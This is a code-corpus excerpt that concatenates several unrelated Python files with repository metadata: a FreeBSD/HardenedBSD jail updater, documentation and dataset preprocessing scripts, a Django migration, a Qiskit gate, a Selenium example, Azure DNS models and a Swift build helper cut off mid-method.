# Additional pre-fetch check on HardenedBSD
if self.host.distribution.name == "HardenedBSD":
_version_snapshot_name = (
f"{self.release.root_dataset.name}"
f"@p{self.patch_version}"
)
try:
self.resource.zfs.get_snapshot(_version_snapshot_name)
yield releaseUpdatePullEvent.skip()
except libzfs.ZFSException:
yield releaseUpdatePullEvent.end()
else:
yield releaseUpdatePullEvent.end()
except Exception as e:
yield releaseUpdatePullEvent.fail(e)
raise
yield releaseUpdateDownloadEvent.begin()
if releaseUpdatePullEvent.skipped is True:
yield releaseUpdateDownloadEvent.skip()
return
self.logger.verbose(
f"Fetching updates for release '{self.release.name}'"
)
self._pre_fetch()
try:
env = dict()
env_clone_keys = ["http_proxy"]
for key in os.environ:
if key.lower() in env_clone_keys:
env[key.lower()] = os.environ[key]
self._create_download_dir()
libioc.helpers.exec(
self._wrap_command(" ".join(self._fetch_command), "fetch"),
shell=True, # nosec: B604
logger=self.logger,
env=env
)
except Exception as e:
yield releaseUpdateDownloadEvent.fail(e)
raise
finally:
self._post_fetch()
yield releaseUpdateDownloadEvent.end()
def _snapshot_release_after_update(self) -> None:
self.release.snapshot(f"p{self.patch_version}")
def apply(
self,
event_scope: typing.Optional['libioc.events.Scope']=None
) -> typing.Generator[typing.Union[
'libioc.events.IocEvent',
bool
], None, None]:
"""Apply the fetched updates to the associated release or jail."""
updates_dataset = self.host_updates_dataset
snapshot_name = libioc.ZFS.append_snapshot_datetime(
f"{updates_dataset.name}@pre-update"
)
runResourceUpdateEvent = libioc.events.RunResourceUpdate(
self.resource,
scope=event_scope
)
_scope = runResourceUpdateEvent.scope
yield runResourceUpdateEvent.begin()
# create snapshot before the changes
updates_dataset.snapshot(name=snapshot_name, recursive=True)
def _rollback_updates_snapshot() -> None:
self.logger.spam(f"Rolling back to snapshot {snapshot_name}")
snapshot = self.resource.zfs.get_snapshot(snapshot_name)
snapshot.rollback(force=True)
snapshot.delete()
runResourceUpdateEvent.add_rollback_step(_rollback_updates_snapshot)
jail = self.temporary_jail
changed: bool = False
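        # _update_jail yields IocEvents while it runs; its final yield is a
        # bool reporting whether the jail contents actually changed.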
try:
for event in self._update_jail(jail, event_scope=_scope):
if isinstance(event, libioc.events.IocEvent):
yield event
else:
changed = (event is True)
except Exception as e:
yield runResourceUpdateEvent.fail(e)
raise
# restore any changes to the update dataset
_rollback_updates_snapshot()
if isinstance(self.resource, libioc.Release.ReleaseGenerator):
self._snapshot_release_after_update()
yield runResourceUpdateEvent.end()
yield changed
def _update_jail(
self,
jail: 'libioc.Jail.JailGenerator',
event_scope: typing.Optional['libioc.events.Scope']
) -> typing.Generator[typing.Union[
'libioc.events.IocEvent',
bool
], None, None]:
events = libioc.events
executeResourceUpdateEvent = events.ExecuteResourceUpdate(
self.resource,
scope=event_scope
)
_scope = executeResourceUpdateEvent.scope
yield executeResourceUpdateEvent.begin()
skipped = False
self._pre_update()
try:
self._create_jail_update_dir()
for event in libioc.Jail.JailGenerator.fork_exec(
jail,
self._wrap_command(" ".join(self._update_command), "update"),
passthru=False,
start_dependant_jails=False,
event_scope=_scope
):
if isinstance(event, libioc.events.JailCommand) is True:
if (event.done is True) and (event.error is None):
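                        # The updater prints this line when the release is
                        # already fully patched; remember it so the update can
                        # be marked as skipped instead of failed.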
_skipped_text = "No updates are available to install."
skipped = (_skipped_text in event.stdout) is True
yield event
self.logger.debug(
f"Update of resource '{self.resource.name}' finished"
)
except Exception as e:
err = libioc.errors.UpdateFailure(
name=self.release.name,
reason=(
f"{self.update_name} failed"
),
logger=self.logger
)
yield executeResourceUpdateEvent.fail(err)
raise e
finally:
if jail.running:
self.logger.debug(
"The update jail is still running. "
"Force-stopping it now."
)
yield from libioc.Jail.JailGenerator.stop(
jail,
force=True,
event_scope=executeResourceUpdateEvent.scope
)
self._post_update()
if skipped is True:
yield executeResourceUpdateEvent.skip("already up to date")
else:
yield executeResourceUpdateEvent.end()
self.logger.verbose(f"Resource '{self.resource.name}' updated")
yield True # ToDo: yield False if nothing was updated
def _pre_fetch(self) -> None:
"""Execute before executing the fetch command."""
pass
def _post_fetch(self) -> None:
"""Execute after executing the fetch command."""
pass
def _pre_update(self) -> None:
"""Execute before executing the update command."""
pass
def _post_update(self) -> None:
"""Execute after executing the update command."""
pass
class HardenedBSD(Updater):
"""Updater for HardenedBSD."""
update_name: str = "hbsd-update"
update_script_name: str = "hbsd-update"
update_conf_name: str = "hbsd-update.conf"
@property
def _update_command(self) -> typing.List[str]:
return [
f"{self.local_release_updates_dir}/{self.update_script_name}",
"-c",
f"{self.local_release_updates_dir}/{self.update_conf_name}",
"-i", # ignore version check (offline)
"-v", str(self.patch_version), "-U", # skip version check
"-n", # no kernel
"-V",
"-D", # no download,
"-T",
"-t",
self.local_temp_dir
]
@property
def _fetch_command(self) -> typing.List[str]:
return [
f"{self.host_updates_dir}/{self.update_script_name}",
"-k",
self.release.name,
"-f", # fetch only
"-c",
f"{self.host_updates_dir}/{self.update_conf_name}",
"-V",
"-T",
"-t",
f"{self.host_updates_dir}/temp",
"-r"
f"{self.resource.root_path}"
]
def _get_release_trunk_file_url(
self,
release: 'libioc.Release.ReleaseGenerator',
filename: str
) -> str:
return "/".join([
"https://raw.githubusercontent.com/HardenedBSD/hardenedBSD",
release.hbds_release_branch,
filename
])
@property
def release_branch_name(self) -> str:
"""Return the branch name of the HBSD release."""
return f"hardened/{self.host.release_version.lower()}/master"
def _pull_updater(self) -> None:
super()._pull_updater()
update_info_url = "/".join([
"https://updates.hardenedbsd.org/pub/HardenedBSD/updates/",
self.release_branch_name,
self.host.processor,
"update-latest.txt"
])
local_path = f"{self.host_updates_dir}/update-latest.txt"
_request = urllib.request # type: ignore
_request.urlretrieve( # nosec: official HardenedBSD URL
update_info_url,
local_path
)
os.chmod(local_path, 0o744)
@property
def patch_version(self) -> int:
"""
Return the latest known patch version.
        On HardenedBSD this version is published among the updates downloaded
        by hbsd-update. Right before fetching an update this file is
        downloaded, so that the revision it mentions can be used for snapshot
creation.
"""
local_path = f"{self.host_updates_dir}/update-latest.txt"
if os.path.isfile(local_path):
with open(local_path, "r", encoding="utf-8") as f:
return int(f.read().split("|")[1].split("-")[1][1:])
else:
return 0
class FreeBSD(Updater):
"""Updater for FreeBSD."""
update_name: str = "freebsd-update"
update_script_name: str = "freebsd-update.sh"
update_conf_name: str = "freebsd-update.conf"
def _get_release_trunk_file_url(
self,
release: 'libioc.Release.ReleaseGenerator',
filename: str
) -> str:
if release.name == "11.0-RELEASE":
release_name = "11.0.1"
else:
fragments = release.name.split("-", maxsplit=1)
release_name = f"{fragments[0]}.0"
base_url = "https://svn.freebsd.org/base/release"
return f"{base_url}/{release_name}/{filename}"
@property
def _base_release_symlink_location(self) -> str:
"""Return the virtual path of a symlink to the release p0 snapshot."""
return f"/tmp/ioc-release-{self.release.full_name}-p0" # nosec: B108
@property
def _update_command(self) -> typing.List[str]:
return [
f"{self.local_release_updates_dir}/{self.update_script_name}",
"--not-running-from-cron",
"-d",
self.local_temp_dir,
"-b",
f"{self._base_release_symlink_location}/",
"--currently-running",
self.release.name,
"-r",
self.release.name,
"-f",
f"{self.local_release_updates_dir}/{self.update_conf_name}",
"install"
]
@property
def _fetch_command(self) -> typing.List[str]:
return [
f"{self.host_updates_dir}/{self.update_script_name}",
"-d",
f"{self.host_updates_dir}/temp",
"--currently-running",
self.release.name,
"-b",
f"{self._base_release_symlink_location}/",
"-f",
f"{self.host_updates_dir}/{self.update_conf_name}",
"--not-running-from-cron",
"fetch"
]
def _modify_updater_config(self, path: str) -> None:
with open(path, "r+", encoding="utf-8") as f:
content = f.read()
content = re.sub(
r"^Components .+$",
"Components world",
content,
flags=re.MULTILINE
)
f.seek(0)
f.write(content)
f.truncate()
def _wrap_command(self, command: str, kind: str) -> str:
if kind == "update":
tolerated_error_message = (
"echo $OUTPUT"
" | grep -c 'No updates are available to install.'"
" >> /dev/null || exit $RC"
)
elif kind == "fetch":
tolerated_error_message = (
"echo $OUTPUT"
" | grep -c 'HAS PASSED ITS END-OF-LIFE DATE.'"
" >> /dev/null || exit $RC"
)
else:
raise ValueError
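        # Assemble a small sh wrapper: run the command, capture its output and
        # exit code, and only propagate a failure when the output does not
        # contain the tolerated message selected above.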
_command = "\n".join([
"set +e",
f"OUTPUT=\"$({command})\"",
"RC=$?",
"echo $OUTPUT",
"if [ $RC -gt 0 ]; then",
tolerated_error_message,
"fi"
])
return _command
@property
def patch_version(self) -> int:
"""
Return the latest known patch version.
        This version is parsed from FreeBSD's /bin/freebsd-version file.
"""
return int(libioc.helpers.get_os_version(
f"{self.resource.root_path}/bin/freebsd-version"
)["patch"])
def _pre_fetch(self) -> None:
"""Execute before executing the fetch command."""
symlink_src = self.release.root_path
if "p0" in [x.snapshot_name for x in self.release.version_snapshots]:
# use p0 snapshot if available
symlink_src += "/.zfs/snapshot/p0"
os.symlink(symlink_src, self._base_release_symlink_location)
def _post_fetch(self) -> None:
"""Execute after executing the fetch command."""
os.unlink(self._base_release_symlink_location)
def _pre_update(self) -> None:
"""Execute before executing the update command."""
lnk = f"{self.resource.root_path}{self._base_release_symlink_location}"
self.resource.require_relative_path(f"{lnk}/..")
if os.path.islink(lnk) is True:
os.unlink(lnk)
os.symlink("/", lnk)
def _post_update(self) -> None:
"""Execute after executing the update command."""
lnk = f"{self.resource.root_path}{self._base_release_symlink_location}"
self.resource.require_relative_path(f"{lnk}/..")
os.unlink(lnk)
def get_launchable_update_resource( # noqa: T484
host: 'libioc.Host.HostGenerator',
resource: 'libioc.Resource.Resource'
) -> Updater:
"""Return an updater instance for the host distribution."""
_class: typing.Type[Updater]
if host.distribution.name == "HardenedBSD":
_class = HardenedBSD
else:
_class = FreeBSD
return _class(
host=host,
resource=resource
)
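# Usage sketch (illustrative, assuming a configured host and release resource):
#   updater = get_launchable_update_resource(host=host, resource=release)
#   for event in updater.fetch():   # download the update assets
#       ...
#   for event in updater.apply():   # apply them inside a temporary jail
#       ...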
| 33.672578 | 79 | 0.589296 |
ba144dec17ab0cdf34bb256b4bb1cb541c69fb52 | 403 | py | Python | docs/setup.py | sandialabs/slycat | efbb91ce4ea4da08b58399eb820f6d6987408e44 | [
"BSD-3-Clause"
] | 66 | 2015-01-06T20:53:50.000Z | 2022-03-30T17:25:04.000Z | docs/setup.py | agentdavidjoseph/slycat | 690e1cb07a6fa990d7206265e18edb22ae3f62e7 | [
"BSD-3-Clause"
] | 782 | 2015-01-05T15:42:30.000Z | 2022-03-11T03:27:52.000Z | docs/setup.py | agentdavidjoseph/slycat | 690e1cb07a6fa990d7206265e18edb22ae3f62e7 | [
"BSD-3-Clause"
] | 23 | 2015-04-29T08:16:27.000Z | 2022-01-05T23:21:54.000Z | import os
import shutil
import subprocess
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
docs_dir = os.path.join(root_dir, "docs/source")
build_dir = os.path.join(docs_dir, "_build")
# Always build the documentation from scratch.
if os.path.exists(build_dir):
shutil.rmtree(build_dir)
# Generate the HTML documentation.
subprocess.check_call(["make", "html"], cwd=docs_dir)
| 26.866667 | 70 | 0.766749 |
a84821915a4da4419a2d501532e00e6811cbacb4 | 12,043 | py | Python | summarize/nnsum/summarization-datasets/preprocess_cnn_dailymail.py | AIPHES/live-blog-summarization | a5f899ea07a098e1e0b3ab92cd3d430776e6412a | [
"Apache-2.0"
] | 2 | 2019-01-17T17:43:09.000Z | 2019-01-17T17:50:38.000Z | summarize/nnsum/summarization-datasets/preprocess_cnn_dailymail.py | AIPHES/live-blog-summarization | a5f899ea07a098e1e0b3ab92cd3d430776e6412a | [
"Apache-2.0"
] | null | null | null | summarize/nnsum/summarization-datasets/preprocess_cnn_dailymail.py | AIPHES/live-blog-summarization | a5f899ea07a098e1e0b3ab92cd3d430776e6412a | [
"Apache-2.0"
] | 1 | 2021-09-19T08:29:08.000Z | 2021-09-19T08:29:08.000Z | import rouge_papier
import requests
import argparse
import pathlib
import os
import shutil
import zipfile
import tempfile
import spacy
from spacy.tokens import Doc
import hashlib
import ujson as json
import re
from multiprocessing import Pool, cpu_count
# Modified Abigail See's preprocessing code.
class WhitespaceTokenizer(object):
def __init__(self, vocab):
self.vocab = vocab
def __call__(self, text):
words = text.split(' ')
# All tokens 'own' a subsequent space character in this tokenizer
spaces = [True] * len(words)
return Doc(self.vocab, words=words, spaces=spaces)
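# The stories are already tokenized, so this whitespace tokenizer is installed
# on the spaCy pipeline (see init_worker below) and spaCy only has to do
# sentence splitting and tagging.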
NUM_EXPECTED_CNN_STORIES = 92579
NUM_EXPECTED_DM_STORIES = 219506
dm_single_close_quote = u'\u2019' # unicode
dm_double_close_quote = u'\u201d'
END_TOKENS = ['.', '!', '?', '...', "'", "`", '"', dm_single_close_quote, dm_double_close_quote, ")"]
def hashhex(s):
"""Returns a heximal formated SHA1 hash of the input string."""
h = hashlib.sha1()
h.update(s)
return h.hexdigest()
def get_url_hashes(url_list):
return [hashhex(url.encode("utf8")) for url in url_list]
REMAP = {"-LRB-": "(", "-RRB-": ")", "-LCB-": "{", "-RCB-": "}",
"-LSB-": "[", "-RSB-": "]", "``": '"', "''": '"'}
def fix_summary(lines):
text = "\n".join(lines)
return re.sub(
r"-LRB-|-RRB-|-LCB-|-RCB-|-LSB-|-RSB-|``|''",
lambda m: REMAP.get(m.group()), text)
def fix_article(lines, nlp):
inputs = []
for line in lines:
line = re.sub(
r"-LRB-|-RRB-|-LCB-|-RCB-|-LSB-|-RSB-|``|''",
lambda m: REMAP.get(m.group()), line)
doc = nlp(line)
for sent in doc.sents:
text = sent.text.strip()
tokens = [w.text.strip().lower() for w in sent]
tc = len([w for w in tokens if len(w) > 0])
if tc == 0:
continue
pos = [w.pos_ for w in sent]
ne = [w.ent_type_ for w in sent]
word_count = len(tokens)
inputs.append({
"text": text,
"tokens": tokens,
"pos": pos,
"ne": ne,
"word_count": word_count})
for i, input in enumerate(inputs, 1):
input["sentence_id"] = i
return inputs
def read_text_file(text_file):
lines = []
with open(text_file, "r") as f:
for line in f:
lines.append(line.strip())
return lines
def check_num_stories(stories_dir, num_expected):
num_stories = len(os.listdir(stories_dir))
if num_stories != num_expected:
raise Exception(
("stories directory {} contains {} "
"files but should contain {}").format(
stories_dir, num_stories, num_expected))
def download_file_from_google_drive(id, expected_size, destination):
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
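    # Google Drive answers large-file downloads with a "download_warning"
    # cookie; its value has to be echoed back as the "confirm" parameter
    # before the real content is streamed.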
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
size = 0
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
size += len(chunk)
print(
"[{:10d} of {:10d}]".format(size, expected_size),
end="\r" if size < expected_size else "\n",
flush=True)
if size != expected_size:
raise Exception(
"Download failed! "
"Actual file size differs from expected file size!")
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params = { 'id' : id }, stream = True)
token = get_confirm_token(response)
if token:
params = { 'id' : id, 'confirm' : token }
response = session.get(URL, params = params, stream = True)
save_response_content(response, destination)
def unzip_file(path, dest):
try:
zip_file = zipfile.ZipFile(path)
zip_file.extractall(dest)
finally:
zip_file.close()
def download_urls(dest_dir):
def save_url(response, dest):
CHUNK_SIZE = 32768
with open(dest, "wb") as fp:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk:
fp.write(chunk)
root_url = "https://github.com/abisee/cnn-dailymail/raw/master/url_lists/"
train_url = root_url + "all_train.txt"
val_url = root_url + "all_val.txt"
test_url = root_url + "all_test.txt"
train_url_path = os.path.join(dest_dir, "all_train.txt")
val_url_path = os.path.join(dest_dir, "all_val.txt")
test_url_path = os.path.join(dest_dir, "all_test.txt")
session = requests.Session()
save_url(session.get(train_url, stream=True), train_url_path)
save_url(session.get(val_url, stream=True), val_url_path)
save_url(session.get(test_url, stream=True), test_url_path)
return train_url_path, val_url_path, test_url_path
def get_art_abs(story_file):
lines = read_text_file(story_file)
# Put periods on the ends of lines that are missing them (this is a problem in the dataset because many image captions don't end in periods; consequently they end up in the body of the article as run-on sentences)
lines = [fix_missing_period(line) for line in lines]
# Separate out article and abstract sentences
article_lines = []
highlights = []
next_is_highlight = False
for idx,line in enumerate(lines):
if line.strip() == "":
continue # empty line
elif line.startswith("@highlight"):
next_is_highlight = True
elif next_is_highlight:
highlights.append(line)
else:
article_lines.append(line)
# Make article into a single string
article = article_lines
abstract = highlights
return article, abstract
def fix_missing_period(line):
"""Adds a period to a line that is missing a period"""
if "@highlight" in line: return line
if line=="": return line
if line[-1] in END_TOKENS: return line
# print line[-1]
return line + " ."
def init_worker():
global nlp
nlp = spacy.load('en', parser=False)
nlp.tokenizer = WhitespaceTokenizer(nlp.vocab)
def preprocess_inputs(args):
story_file, inputs_dir, labels_dir, abs_dir = args
global nlp
article, abstract = get_art_abs(story_file)
abstract_text = fix_summary(abstract)
inputs = fix_article(article, nlp)
story_id = os.path.basename(story_file).split(".")[0]
if len(inputs) == 0:
print("\nBAD:", story_id)
return None
example = {"id": story_id, "inputs": inputs}
inputs_path = inputs_dir / "{}.json".format(story_id)
inputs_path.write_text(json.dumps(example))
abs_path = abs_dir / "{}.spl".format(story_id)
abs_path.write_text(abstract_text)
labels = get_labels(example, [abstract_text], 50)
labels_path = labels_dir / "{}.json".format(story_id)
labels_path.write_text(json.dumps(labels))
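# Extractive labels come from rouge_papier's sequential (greedy) oracle:
# sentences whose addition improves ROUGE-1 against the abstract are marked 1,
# the rest 0, padded out to the full number of input sentences.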
def get_labels(example, summary_texts, sent_limit):
input_texts = [input["text"] if input["word_count"] > 2 else "@@@@@@"
for input in example["inputs"]][:sent_limit]
ranks, pairwise_ranks = rouge_papier.compute_extract(
input_texts, summary_texts, mode="sequential", ngram=1,
remove_stopwords=True, length=100)
labels = [1 if r > 0 else 0 for r in ranks]
if len(labels) < len(example["inputs"]):
delta = len(example["inputs"]) - len(labels)
labels.extend([0] * delta)
return {"id": example["id"], "labels": labels}
def write_to_file(url_path, cnn_dir, dm_dir, inputs_dir,
labels_dir, abs_dir, pool):
inputs_dir.mkdir(exist_ok=True, parents=True)
labels_dir.mkdir(exist_ok=True, parents=True)
abs_dir.mkdir(exist_ok=True, parents=True)
url_list = read_text_file(url_path)
url_hashes = get_url_hashes(url_list)
story_fnames = [s+".story" for s in url_hashes]
num_stories = len(story_fnames)
story_paths = []
for fn in story_fnames:
if os.path.isfile(os.path.join(cnn_dir, fn)):
story_paths.append(
(os.path.join(cnn_dir, fn), inputs_dir, labels_dir, abs_dir))
elif os.path.isfile(os.path.join(dm_dir, fn)):
story_paths.append(
(os.path.join(dm_dir, fn), inputs_dir, labels_dir, abs_dir))
else:
raise Exception("Missing file for story {}".format(fn))
result_iter = pool.imap(preprocess_inputs, story_paths)
for idx, result in enumerate(result_iter, 1):
print(
"Writing story {}/{}".format(idx, num_stories),
end="\r" if idx < num_stories else "\n",
flush=True)
def main():
CNN_TOK_GID = "0BzQ6rtO2VN95cmNuc2xwUS1wdEE"
CNN_TOK_EXPECTED_SIZE = 207268941
DM_TOK_GID = "0BzQ6rtO2VN95bndCZDdpdXJDV1U"
DM_TOK_EXPECTED_SIZE = 482735659
parser = argparse.ArgumentParser()
parser.add_argument("--data-dir", type=pathlib.Path, required=True)
parser.add_argument(
"--procs", type=int, required=False, default=None)
args = parser.parse_args()
if args.procs is None:
args.procs = min(cpu_count(), 16)
try:
workdir = tempfile.mkdtemp()
print("Downloading train/val/test splits.")
train_urls, val_urls, test_urls = download_urls(workdir)
DM_TOK_ZIP = os.path.join(workdir, "dm_stories_tokenized.zip")
CNN_TOK_ZIP = os.path.join(workdir, "cnn_stories_tokenized.zip")
DM_TOK_STORIES = os.path.join(workdir, "dm_stories_tokenized")
CNN_TOK_STORIES = os.path.join(workdir, "cnn_stories_tokenized")
print("Downloading DailyMail data from googledrive.")
download_file_from_google_drive(
DM_TOK_GID, DM_TOK_EXPECTED_SIZE, DM_TOK_ZIP)
print("Unpacking DailMail data.")
unzip_file(DM_TOK_ZIP, workdir)
print("Downloading CNN data from googledrive.")
download_file_from_google_drive(
CNN_TOK_GID, CNN_TOK_EXPECTED_SIZE, CNN_TOK_ZIP)
print("Unpacking CNN data.")
unzip_file(CNN_TOK_ZIP, workdir)
check_num_stories(CNN_TOK_STORIES, NUM_EXPECTED_CNN_STORIES)
check_num_stories(DM_TOK_STORIES, NUM_EXPECTED_DM_STORIES)
data_dir = args.data_dir / "cnn-dailymail"
train_stories = data_dir / "inputs" / "train"
val_stories = data_dir / "inputs" / "valid"
test_stories = data_dir / "inputs" / "test"
train_labels = data_dir / "labels" / "train"
val_labels = data_dir / "labels" / "valid"
test_labels = data_dir / "labels" / "test"
train_abstracts = data_dir / "human-abstracts" / "train"
valid_abstracts = data_dir / "human-abstracts" / "valid"
test_abstracts = data_dir / "human-abstracts" / "test"
pool = Pool(args.procs, initializer=init_worker)
print("Writing cnn/dailymail validation data...")
write_to_file(
val_urls,
CNN_TOK_STORIES,
DM_TOK_STORIES,
val_stories,
val_labels,
valid_abstracts,
pool)
print("Writing cnn/dailymail train data...")
write_to_file(
train_urls,
CNN_TOK_STORIES,
DM_TOK_STORIES,
train_stories,
train_labels,
train_abstracts,
pool)
print("Writing cnn/dailymail test data...")
write_to_file(
test_urls,
CNN_TOK_STORIES,
DM_TOK_STORIES,
test_stories,
test_labels,
test_abstracts,
pool)
finally:
shutil.rmtree(workdir)
if __name__ == "__main__":
main()
| 32.636856 | 215 | 0.61488 |
f7e084176b8928ef086e3b810e017bfd178b34ed | 403 | py | Python | evap/grades/migrations/0010_gradedocument_description_en_add_unique.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 29 | 2020-02-28T23:03:41.000Z | 2022-02-19T09:29:36.000Z | evap/grades/migrations/0010_gradedocument_description_en_add_unique.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 737 | 2015-01-02T17:43:25.000Z | 2018-12-10T20:45:10.000Z | evap/grades/migrations/0010_gradedocument_description_en_add_unique.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 83 | 2015-01-14T12:39:41.000Z | 2018-10-29T16:36:43.000Z | # Generated by Django 1.9 on 2016-02-01 18:19
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('grades', '0009_fill_description_en'),
]
operations = [
migrations.AlterUniqueTogether(
name='gradedocument',
unique_together=set([('course', 'description_de'), ('course', 'description_en')]),
),
]
| 22.388889 | 94 | 0.620347 |
d72316a437223092416ef9f2809b646b559cf672 | 1,952 | py | Python | qiskit/extensions/standard/rz.py | PierreDC/qiskit-sdk-py | e879167ac86ee731f53ee71c10210ba37e4559ab | [
"Apache-2.0"
] | null | null | null | qiskit/extensions/standard/rz.py | PierreDC/qiskit-sdk-py | e879167ac86ee731f53ee71c10210ba37e4559ab | [
"Apache-2.0"
] | null | null | null | qiskit/extensions/standard/rz.py | PierreDC/qiskit-sdk-py | e879167ac86ee731f53ee71c10210ba37e4559ab | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2017, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=invalid-name
"""
Rotation around the z-axis.
"""
from qiskit import Gate
from qiskit import InstructionSet
from qiskit import QuantumCircuit
from qiskit import QuantumRegister
from qiskit.dagcircuit import DAGCircuit
from qiskit.extensions.standard import header # pylint: disable=unused-import
from qiskit.extensions.standard.u1 import U1Gate
class RZGate(Gate):
"""rotation around the z-axis."""
def __init__(self, phi, qubit, circ=None):
"""Create new rz single qubit gate."""
super().__init__("rz", [phi], [qubit], circ)
self._define_decompositions()
def _define_decompositions(self):
"""
gate rz(phi) a { u1(phi) a; }
"""
decomposition = DAGCircuit()
q = QuantumRegister(1, "q")
decomposition.add_qreg(q)
decomposition.add_basis_element("u1", 1, 0, 1)
rule = [
U1Gate(self.param[0], q[0])
]
for inst in rule:
decomposition.apply_operation_back(inst)
self._decompositions = [decomposition]
def inverse(self):
"""Invert this gate.
rz(phi)^dagger = rz(-phi)
"""
self.param[0] = -self.param[0]
self._define_decompositions()
return self
def reapply(self, circ):
"""Reapply this gate to corresponding qubits in circ."""
self._modifiers(circ.rz(self.param[0], self.qargs[0]))
def rz(self, phi, q):
"""Apply Rz to q."""
if isinstance(q, QuantumRegister):
instructions = InstructionSet()
for j in range(q.size):
instructions.add(self.rz(phi, (q, j)))
return instructions
self._check_qubit(q)
return self._attach(RZGate(phi, q, self))
QuantumCircuit.rz = rz
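# Usage sketch (illustrative, assuming the surrounding qiskit API of this era):
#   q = QuantumRegister(1, "q")
#   circ = QuantumCircuit(q)
#   circ.rz(0.5, q[0])  # appends an RZGate(0.5) acting on q[0]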
| 27.111111 | 78 | 0.632684 |
4292e984335fc38e0c22bee14d1a5441a6ba06ba | 302 | py | Python | python/LinkedInLearning/Ex_Files_Python_Automation_Testing/Exercise Files/CH03/03_01/code_03_01.py | Youngermaster/Selenium-Scripts | e8e785780ee83e4b4f122f64bd61189f33a1825a | [
"MIT"
] | null | null | null | python/LinkedInLearning/Ex_Files_Python_Automation_Testing/Exercise Files/CH03/03_01/code_03_01.py | Youngermaster/Selenium-Scripts | e8e785780ee83e4b4f122f64bd61189f33a1825a | [
"MIT"
] | null | null | null | python/LinkedInLearning/Ex_Files_Python_Automation_Testing/Exercise Files/CH03/03_01/code_03_01.py | Youngermaster/Selenium-Scripts | e8e785780ee83e4b4f122f64bd61189f33a1825a | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
driver = webdriver.Firefox()
driver.get("http://python.org")
search = driver.find_element_by_name('q')
search.clear()
search.send_keys("pycon")
search.send_keys(Keys.RETURN)
time.sleep(4)
driver.close()
| 20.133333 | 47 | 0.768212 |
e441cabf4f5ff6f09fd3b8c8b855674f8bb8b376 | 1,349 | py | Python | sdk/network/azure-mgmt-dns/azure/mgmt/dns/v2018_03_01_preview/models/_paged_models.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/network/azure-mgmt-dns/azure/mgmt/dns/v2018_03_01_preview/models/_paged_models.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 226 | 2019-07-24T07:57:21.000Z | 2019-10-15T01:07:24.000Z | sdk/network/azure-mgmt-dns/azure/mgmt/dns/v2018_03_01_preview/models/_paged_models.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.paging import Paged
class RecordSetPaged(Paged):
"""
A paging container for iterating over a list of :class:`RecordSet <azure.mgmt.dns.v2018_03_01_preview.models.RecordSet>` object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[RecordSet]'}
}
def __init__(self, *args, **kwargs):
super(RecordSetPaged, self).__init__(*args, **kwargs)
class ZonePaged(Paged):
"""
A paging container for iterating over a list of :class:`Zone <azure.mgmt.dns.v2018_03_01_preview.models.Zone>` object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[Zone]'}
}
def __init__(self, *args, **kwargs):
super(ZonePaged, self).__init__(*args, **kwargs)
| 32.902439 | 131 | 0.582654 |
1780df502749998e5ea90bd8f187fe88eff955c6 | 3,484 | py | Python | utils/swift_build_support/swift_build_support/products/zlib.py | xjc90s/swift | cafe5ccbd1b7aa9cc9c837c5be2cdf3d5acd8a49 | [
"Apache-2.0"
] | 1 | 2022-03-27T15:28:07.000Z | 2022-03-27T15:28:07.000Z | utils/swift_build_support/swift_build_support/products/zlib.py | xjc90s/swift | cafe5ccbd1b7aa9cc9c837c5be2cdf3d5acd8a49 | [
"Apache-2.0"
] | null | null | null | utils/swift_build_support/swift_build_support/products/zlib.py | xjc90s/swift | cafe5ccbd1b7aa9cc9c837c5be2cdf3d5acd8a49 | [
"Apache-2.0"
] | null | null | null | # swift_build_support/products/zlib.py ------------------------------------
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
from . import cmake_product
from . import earlyswiftdriver
class Zlib(cmake_product.CMakeProduct):
@classmethod
def is_build_script_impl_product(cls):
"""is_build_script_impl_product -> bool
Whether this product is produced by build-script-impl
"""
return False
@classmethod
def is_before_build_script_impl_product(cls):
"""is_before_build_script_impl_product -> bool
Whether this product is built before any build-script-impl products
"""
return True
@classmethod
def is_nondarwin_only_build_product(cls):
return True
@classmethod
def get_dependencies(cls):
return [earlyswiftdriver.EarlySwiftDriver]
def should_build(self, host_target):
"""should_build() -> Bool
Return True if zlib should be built
"""
return self.args.build_zlib
def should_test(self, host_target):
"""should_test() -> Bool
Returns True if zlib should be tested.
        Currently this always returns False.
"""
return False
def should_install(self, host_target):
